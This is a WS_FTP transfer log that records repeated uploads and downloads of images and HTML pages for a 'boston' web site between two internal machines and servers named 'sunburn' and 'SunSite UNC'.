10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:47 B C:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:47 B C:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:47 B C:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:47 B C:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:47 B C:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:47 B C:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:47 B C:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:47 B C:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:47 B C:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:47 B C:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:47 B C:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:47 B C:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
